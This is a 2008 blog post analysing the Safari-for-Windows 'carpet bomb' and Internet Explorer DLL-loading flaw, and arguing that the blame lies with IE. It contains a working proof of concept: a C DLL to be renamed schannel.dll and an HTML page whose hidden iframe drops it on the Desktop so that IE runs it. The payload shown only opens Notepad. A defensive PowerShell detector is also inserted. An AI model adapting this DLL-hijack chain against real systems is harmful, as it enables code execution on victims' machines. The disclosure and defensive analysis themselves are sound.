*Safari for Windows "Blended Threat" Credit*

The "Blended Threat" credit surely goes to Aviv Raff.

He didn't publish the technical details.

But if you are familiar with his past findings ...

IE Patch Going to Fix The Security Issue Involving Safari This Tuesday?

Well, I have to admit the title is weird: Microsoft fixes a Safari issue with an IE patch.

But these are the words in the news: "Patch Tuesday this month ... The Internet Explorer bulletin is expected to be cumulative and might include some remediation for the Safari for Windows vulnerability disclosed last month by Nitesh Dhanjani". The claim is that the IE patch is meant to help remediate a Safari vulnerability. This goes against all common sense. When did Microsoft become a charity?

In the advisory Microsoft says it "may include releasing a security update through the security update release process", and also acknowledges "Aviv Raff for working with us and reporting the blended threat of Safari and Microsoft Internet Explorer". On Aviv Raff's side, he also indicates "I've reported this issue to Microsoft over a week ago" and "I've decided to work with Microsoft on this issue". The advisory was published on May 30, 2008.

(So the issue here is the discovery by Aviv Raff, not the discovery by Nitesh Dhanjani. The former involves both IE and Safari; the latter involves only Safari. More details here.)

A New Security Issue in Safari for Windows, NOT the "Blended Threat" Described in Microsoft Security Advisory 953818

Safari for Windows can download a fake icon (a Shortcut, i.e. .LNK, file) to the Desktop. The user might then launch it, because the icon can look legitimate. This results in command execution, which is as dangerous as remote code execution.

A mitigating factor is that Safari's "Downloads" window pops up and shows the downloaded icon (the Shortcut .LNK file): its name, its look, and the arrow that marks a Shortcut file. So the user is well informed about it as Safari downloads it.

Please note this issue is NOT the "blended threat" described in Microsoft Security Advisory 953818 which Aviv Raff is working on with Microsoft.

Should Apple's Safari for Windows be Blamed for "Blended Threat" Described in Microsoft Security Advisory 953818?

Microsoft used some vague wording in the advisory: "Suggested Actions" are "Restrict use of Safari as a web browser ...".

It sounds as if it's a flaw rooted in Safari. But what exactly is the role Safari plays in this "blended threat"? The answer is that Safari for Windows puts downloads on the Desktop by default without a dialog box (such as the "File Download" dialog box in IE). This is in fact a quite reasonable and convenient feature: downloading the requested file and saving it to the user's Desktop by default. The feature itself does not constitute a mistake. What really makes the "blended threat" is a problem in how Windows Internet Explorer (and probably other programs) loads program library files (DLLs); the technical details are here.

Design Flaw in Windows Internet Explorer Allows Remote Code Execution From Safari for Windows

Summary of What Happened
Nitesh Dhanjani discovered that Safari for Windows puts downloads automatically to Desktop and argued this can potentially make a mess of Desktop, naming it the effect of "Safari Carpet Bomb". Later Microsoft issued an advisory stating "remote code execution on all supported versions of Windows XP and Windows Vista" and "Aviv Raff for working with us and reporting the blended threat of Safari and Microsoft Internet Explorer". Aviv Raff posted on his blog "Safari pwns Internet Explorer", clarifying "this combined attack also exploits an old vulnerability in Internet Explorer that I've already reported to them a long long time ago".

Technical Details of This Incident

The old vulnerability that Aviv Raff reported to Microsoft a long time ago is described in two articles by Aviv Raff: IE7 DLL-load hijacking Code Execution Exploit PoC, and Internet Explorer 7 - Still Spyware Writers Heaven, both dating back to 2006 (yeah, that's really "a long long time ago"). The vulnerability is that Windows Internet Explorer loads program library files (DLLs) from the user's Desktop instead of its own library folder (usually C:\WINDOWS\SYSTEM32) when the filenames are set to some specific values.

Safari for Windows downloads files to the Desktop by default with no confirmation, which is a quite reasonable and convenient feature. And Windows Internet Explorer loads a program library (DLL) from the Desktop if its filename is set to some specific value. Add the two together, or "blend" them, and IE loads a library file downloaded by Safari. Loading a library runs the code in the library file, and loading the wrong file results in executing the wrong code.
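As an added example, not part of the original post, here is a PowerShell check a defender can run for the precondition the blend depends on: a DLL sitting in a download folder under a system DLL's name. It assumes the Desktop and Downloads folders are the locations of interest and requires Get-FileHash (Windows PowerShell 4.0 or later).

```powershell
# Added example (not from the original post): lists DLL files in the user's
# Desktop (Safari for Windows' default download folder) and Downloads folder
# whose name matches a DLL in System32, and compares each with the genuine copy.

$system32 = Join-Path $env:SystemRoot 'System32'

# Map of system DLL name -> full path. A PowerShell hashtable literal compares
# string keys case-insensitively, which matches how Windows resolves file names.
$systemDlls = @{}
Get-ChildItem -LiteralPath $system32 -Filter '*.dll' -File | ForEach-Object {
    $systemDlls[$_.Name] = $_.FullName
}

# User-writable folders where browser downloads land (assumed set of folders).
$dropFolders = @(
    [Environment]::GetFolderPath('Desktop')
    (Join-Path $env:USERPROFILE 'Downloads')
)

$findings = foreach ($folder in $dropFolders) {
    if (-not (Test-Path -LiteralPath $folder)) { continue }
    Get-ChildItem -LiteralPath $folder -Filter '*.dll' -File -ErrorAction SilentlyContinue |
        Where-Object { $systemDlls.ContainsKey($_.Name) } |
        ForEach-Object {
            $genuine     = $systemDlls[$_.Name]
            $suspectHash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
            $genuineHash = (Get-FileHash -LiteralPath $genuine -Algorithm SHA256).Hash
            [PSCustomObject]@{
                Suspect   = $_.FullName
                Shadows   = $genuine
                SameBytes = ($suspectHash -eq $genuineHash)
                Signature = (Get-AuthenticodeSignature -LiteralPath $_.FullName).Status
                Written   = $_.LastWriteTime
            }
        }
}

if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    Write-Output "No system DLL names found in: $($dropFolders -join '; ')"
}
```

A hit that differs in bytes from the System32 copy and carries no valid signature is exactly the situation described above; a byte-identical copy is harmless but still worth removing, since it shows something dropped a system DLL name into a download folder.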

Proof of Concept Code
----------dll.c----------
#include <windows.h>

/* DllMain runs inside whichever process maps this DLL. In the incident
   described above that process is Internet Explorer, which resolves
   "schannel.dll" to the copy Safari saved on the Desktop. */
BOOL APIENTRY DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved
)
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    /* CreateProcess may modify the command-line buffer, so use a writable
       array rather than a string literal. The argument is a file name that
       does not exist; Notepad just opens with it in the title bar. */
    char cmd[] = "NOTEPAD \"=====(((((we are in)))))=====\"";

    (void)hinstDLL;
    (void)lpvReserved;

    /* Launch Notepad once, on process attach only; DllMain is also called
       for every thread attach/detach and would otherwise spawn repeatedly. */
    if (fdwReason != DLL_PROCESS_ATTACH)
        return TRUE;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    if (CreateProcessA(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
    return TRUE;
}

Compile with cl /LD dll.c and rename the generated DLL file to "schannel.dll".

----------index.html----------

<html><head>
<title>Safari for Windows Proof of Concept (Incident in June 2008)</title>
</head><body>
Safari for Windows Proof of Concept (Incident in June 2008)<br>
<br>
<a href="http://liudieyu0.blog124.fc2.com/blog-entry-1.html">Detailed Analysis Available on My Blog ...</a><br>
<br>
Step 1. Browse this web page with Safari for Windows, and download is copied to Desktop.
It's a legitimate feature.<br>
<iframe src="schannel.dll" width=1 height=1></iframe><br>
Step 2. Now launch Internet Explorer from Desktop or Start Menu, and code from the DLL file is executed.
<i>This is the issue.</i><br>
<br>
Note:<br>
Code in the DLL file launches NOTEPAD to open a file that doesn't exist.<br>
Please remove the downloaded DLL file on Desktop after testing.<br>
</body></html>

Live Demo
http://liudieyu.com/iesafari200806.2885391780966027/

Final Words on This
A design flaw in Windows Internet Explorer, versions 8 beta and 7 and probably others, breaks the security of Safari for Windows as shipped by Apple. The problem originates from an error in Windows Internet Explorer: it will load some program library files (DLLs) from the user's Desktop instead of its own library folder (usually C:\WINDOWS\SYSTEM32). Apple's Safari for Windows downloads and saves the requested file to the user's Desktop by default; this default behavior itself does not constitute a mistake. Microsoft used some vague wording in the advisory: the "Suggested Actions" are "Restrict use of Safari as a web browser ...", as if it were a flaw rooted in Safari.

Under "Suggested Actions" Microsoft admits a "Workaround": "Change the download location of content in Safari to a newly created directory". The full statement should be "Change the download location of content in Safari to a newly created directory (to preserve the integrity of Windows Internet Explorer)".

PS:
I'm not an Apple fan; in fact I applied for their Safari for Windows Tester position and they never replied. It's not so lame, because they don't even get back to reporters when the whole world is accusing their product: "An Apple spokesman did not return a phone call and e-mail seeking comment".

I believe in time all things come to light.